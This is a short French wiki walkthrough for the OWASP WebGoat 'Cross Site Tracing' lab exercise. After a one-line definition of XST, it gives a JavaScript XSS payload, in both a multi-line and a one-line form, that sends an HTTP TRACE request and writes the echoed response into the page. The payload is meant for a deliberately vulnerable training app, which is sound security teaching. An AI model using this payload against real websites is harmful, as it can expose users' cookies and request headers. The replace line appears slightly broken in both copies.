OWASP WebGoat:Cross Site Tracing Attacks

From aldeid
Jump to navigation Jump to search

Cross Site Tracing (XST) Attacks

Définition

Le Cross site tracing, abrégé XST, est une manière d'exploiter les failles de sécurité de type XSS, mettant à profit la méthode TRACE du protocole HTTP.

Exercice

Insérer le code suivant (sur une seule ligne) dans le champ "Enter your three digit access code" : 

<script type="text/javascript">
if ( navigator.appName.indexOf("Microsoft") !=-1)
{
  var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
  xmlHttp.open("TRACE", "./", false);
  xmlHttp.send();
  str1 = xmlHttp.responseText;
  while (str1.indexOf("\n") > -1)
  {
    str1 = str1.replace("\n","
");
  }
  document.write(str1);
}
</script>

Ce qui donne (sur une seule ligne) : 

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","
"); document.write(str1);}</script>
Retrieved from "https://www.aldeid.com/w/index.php?title=OWASP_WebGoat:Cross_Site_Tracing_Attacks&oldid=35402"